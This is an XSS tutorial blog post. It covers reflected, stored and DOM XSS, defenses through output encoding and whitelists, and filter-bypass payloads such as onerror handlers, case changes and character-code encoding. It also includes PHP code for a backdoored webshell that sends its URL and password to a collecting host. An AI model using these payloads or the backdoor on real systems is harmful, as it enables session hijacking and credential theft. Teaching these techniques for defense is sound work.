Penetration basics: cross-site scripting (XSS)

Vulnerability principles and defenses

XSS is also called CSS (Cross Site Script); because that abbreviation collides with Cascading Style Sheets, it is written XSS. In Chinese it is called a cross-site scripting attack.

An XSS attack is essentially HTML injection: the attacker tampers with a page by inserting a malicious script, so that when a user browses the page the script runs in the user's browser and gives the attacker a way to control it.

Harm

  • Theft of the user's cookies

  • Drive-by download ("hanging a horse", the watering-hole attack)

    Exploit code is implanted in a site the victims visit frequently; visitors get malware installed on their machine or have information stolen directly.

  • Worms (need to be combined with CSRF)

  • Keyloggers (with limitations)

Defense

  1. Entity-encode HTML special characters. The best filter is to entity-encode (HTML-encode) at the point of output, and to encode again wherever the value is output a second time, so that injected script is never interpreted as markup.
  2. Blacklist or whitelist tag event attributes. Special-character filtering alone is easily bypassed, so tags and their event attributes must also be blacklisted or whitelisted. A whitelist is recommended, implemented directly with regular expressions: if the input does not match the whitelist, block the request outright rather than stripping the offending part and passing an emptied value on.
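The two defenses above, as an added example that is not part of the original post: an output-time HTML entity encoder next to the vulnerable and fixed versions of a reflecting template, and a regular-expression whitelist for a comment field that rejects anything not on the list instead of emptying it. The allowed tag list, the function names and the sample payloads are assumptions made for the example; it runs under Node.js with no dependencies.

```javascript
// Added example (not from the original post): output-time HTML entity encoding
// and a whitelist check that rejects rather than strips. Node.js, no dependencies.

// 1. Entity-encode the characters that can break out of an HTML text or
//    attribute context. '&' is in the map so an encoded value is not decoded
//    back into markup by the browser.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// A minimal reflected-output template: the vulnerable version splices the
// request parameter in raw, the fixed version encodes it at output time.
function renderVulnerable(param) {
  return `<div id="result">${param}</div>`;
}

function renderSafe(param) {
  return `<div id="result">${escapeHtml(param)}</div>`;
}

// 2. Whitelist instead of blacklist. Only these tags (assumed list), with no
//    attributes at all, are accepted; anything else fails the check.
const ALLOWED_TAGS = ['b', 'i', 'u', 'p', 'br'];
const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g;       // every tag-like token
const BARE_TAG_RE = /^<\/?[a-zA-Z0-9]+\s*\/?>$/;              // tag name only, no attributes

function isWhitelisted(html) {
  for (const match of html.matchAll(TAG_RE)) {
    const fullTag = match[0];
    const name = match[1].toLowerCase();                      // <ScRiPt> is still script
    if (!ALLOWED_TAGS.includes(name)) return false;           // unknown tag
    if (!BARE_TAG_RE.test(fullTag)) return false;             // carries attributes / handlers
  }
  return true;
}

// Block the submission instead of "cleaning" it and continuing.
function handleComment(html) {
  if (!isWhitelisted(html)) {
    return { accepted: false, stored: null };
  }
  return { accepted: true, stored: html };
}

// Constructed sample inputs.
const payload = '<script>alert(1)</script>';
console.log(renderVulnerable(payload));   // script tag reaches the browser intact
console.log(renderSafe(payload));         // &lt;script&gt;alert(1)&lt;/script&gt;
console.log(handleComment('<b>bold</b>'));
console.log(handleComment('<b onmouseover="alert(1)">x</b>'));
console.log(handleComment('<ScRiPt>alert(1)</ScRiPt>'));
```

The whitelist only decides whether the markup is acceptable; the text between the allowed tags still has to go through escapeHtml when it is rendered, and a value placed inside an attribute or a script block needs the encoding appropriate to that context.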

XSS principle: an output problem lets attacker-supplied JS be recognized and executed

Where the vulnerability comes from: the output problem

A page that echoes a request parameter back returns 1 when given the value 1; give it script code in the same parameter and the script is written into the page and runs.

This is a simple reflected XSS.

XSS classification

  • Reflected XSS (non-persistent)

    Passes through the server, but never touches the database.

  • Stored XSS (persistent)

    Written directly into the database, so it persists and is served by the server on every visit.

  • DOM XSS

    Behaves like reflected XSS, but happens entirely on the client: the server is not involved, and JavaScript splices the input directly into the page.

Cookie theft

Principle:

Insert a stored XSS script in a comment area; every time a user views the comments the malicious script loads and sends the user's local cookie to the attacker's platform. (Cookies flagged HttpOnly are not exposed to document.cookie and so are not captured this way.)

After obtaining a webshell, modify the page shown after a successful login and insert the cookie-stealing XSS code there.

XSS platform

// XSS code implanted at the bottom of the page
<script src=""></script> // the script served by the XSS platform

XSS attack based on a webshell "box"

By implanting XSS code into the website's back-end (the webshell itself), the information it collects is sent to the attacker's own penetration site.

help.php (the backdoor)

<?php
    // ... the normal "big horse" webshell code goes here; it is assumed to set $password
    // Implanted XSS:
    $url = $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; // host and path of this webshell
    // Send the webshell path and password to the attacker's own site. The src value
    // can be changed to an XSS cookie-stealing script instead.
    echo "<script src=\"http://127.0.0.1/Webshell/index.php?u=" . urlencode($url) . "&p=" . urlencode($password) . "\"></script>";
?>

index.php (receives the reported information)

<?php
    $url  = $_GET['u'];
    $pass = $_GET['p'];
    // Could be changed to write into a database instead of a file
    $file = fopen('webshell.html', 'a+');
    fwrite($file, $url);
    fwrite($file, "<br>");
    fwrite($file, $pass);
    fwrite($file, "<br>");
    fclose($file);
?>

Scenario:

Suppose hacker A uploads a "big horse" webshell that hacker B has already backdoored. The implanted code sends A's webshell URL and password to hacker B's webshell box.

Hacker B receives the information in the box.

This is the webshell "box" intrusion.

If the implanted code is changed to a cookie-stealing XSS payload, it can obtain the victim's privileges (session) as well.

XSS filter protections and bypasses (see the reference links)

https://www.freebuf.com/articles/web/153055.html

https://www.secpulse.com/archives/57411.html

Protection:

  1. Keyword filtering
  2. Special-symbol filtering
  3. String-length limits
  4. Escaping / encoding on output

Bypass:

  1. Change case

  2. Use whitespace or separator characters

    1. %00
  3. Hex encoding

  4. Call through other tags
    1. < img src="javascript:alert(1);"> (javascript: URLs in img src no longer execute in modern browsers)
    2. <img src=/ onerror="alert(1)"></img> The image cannot be found, so the error handler runs the code
  5. JS built-in functions

    1. String.fromCharCode(88,83,83) converts ASCII codes into characters ("XSS")

    2. Bypass when alert(1) itself is filtered

      Execute through eval, which requires converting the payload's encoding

      e.g. write alert with Unicode escapes (\u0061lert); the filter sees \u0061lert, the JS parser sees alert
Real-world notes

  1. Close the enclosing tag first

    If the first closing attempt does nothing

    Try closing one more layer

    Then the alert pops

  2. Case bypass

  3. Double-writing bypass (nest the keyword inside itself so that one strip pass reassembles it)

  4. Inject into other tags

  5. Add the # locator (fragment)
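The bypass list and the real-world notes above, as an added example that is not part of the original post: a naive keyword blacklist of the kind those techniques defeat, one constructed payload per technique (case change, other tag, double writing, String.fromCharCode, Unicode escapes, and closing an enclosing attribute), and the decoding steps that show why the pieces the filter lets through still execute in a browser. The blacklist contents, function names and payloads are assumptions for the example; it runs under Node.js with no dependencies.

```javascript
// Added example (not from the original post): a naive keyword blacklist, the
// payloads that slip past it, and why they still run. Node.js, no dependencies.

// Blacklist that knows only canonical lowercase spellings and strips each
// keyword once (assumed filter for the example).
const BLACKLIST = ['<script>', 'alert'];

function naiveBlacklistFilter(input) {
  let out = input;
  for (const bad of BLACKLIST) {
    out = out.split(bad).join('');
  }
  return out;
}

// Constructed payloads, one per bypass technique from the list above.
const PAYLOADS = {
  // the tag blacklist is case-sensitive, HTML is not
  changeCase: '<ScRiPt>confirm(1)</ScRiPt>',
  // no <script> at all: a broken image fires its onerror handler
  otherTag: '<img src=/ onerror="confirm(1)">',
  // nest the keyword inside itself; one strip pass reassembles <script>
  doubleWrite: '<scr<script>ipt>confirm(1)</script>',
  // 'alert(1)' is built from character codes at run time, so the text never contains it
  fromCharCode: '<img src=/ onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">',
  // same idea with a Unicode escape: the filter sees \u0061lert, the JS parser sees alert
  unicodeEscape: '<img src=/ onerror="eval(\'\\u0061lert(1)\')">',
};

// True when the filter changed nothing, i.e. the payload reaches the page as sent.
function passesUntouched(payload) {
  return naiveBlacklistFilter(payload) === payload;
}

// What the browser does with the pieces the filter let through.
function decodeCharCodes(codes) {
  return String.fromCharCode(...codes);            // [88,83,83] -> 'XSS'
}

function decodeUnicodeEscapes(source) {
  // The JS parser turns \uXXXX inside a string literal into the character itself.
  return source.replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Real-world note 1: close the enclosing tag/attribute first. This page reflects
// the value inside an attribute, so a leading " breaks out of it and the rest
// of the payload becomes new attributes, including an event handler.
function renderInAttribute(value) {
  return `<input type="text" value="${value}">`;
}
const CLOSE_ATTRIBUTE_PAYLOAD = '" autofocus onfocus="confirm(1)';

for (const [name, payload] of Object.entries(PAYLOADS)) {
  const filtered = naiveBlacklistFilter(payload);
  console.log(name.padEnd(14), passesUntouched(payload) ? 'passes untouched' : `altered -> ${filtered}`);
}
console.log(naiveBlacklistFilter('<script>alert(1)</script>'));   // only the canonical form is mangled
console.log(decodeCharCodes([88, 83, 83]));
console.log(decodeUnicodeEscapes('\\u0061lert(1)'));
console.log(renderInAttribute(CLOSE_ATTRIBUTE_PAYLOAD));
```

Every one of these payloads depends on a `<`, a `"` or an event attribute surviving to the browser, which is why the defense section recommends entity encoding at output time and a whitelist that rejects unmatched input rather than a keyword blacklist that strips it.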


Source: www.cnblogs.com/r0ckysec/p/11415355.html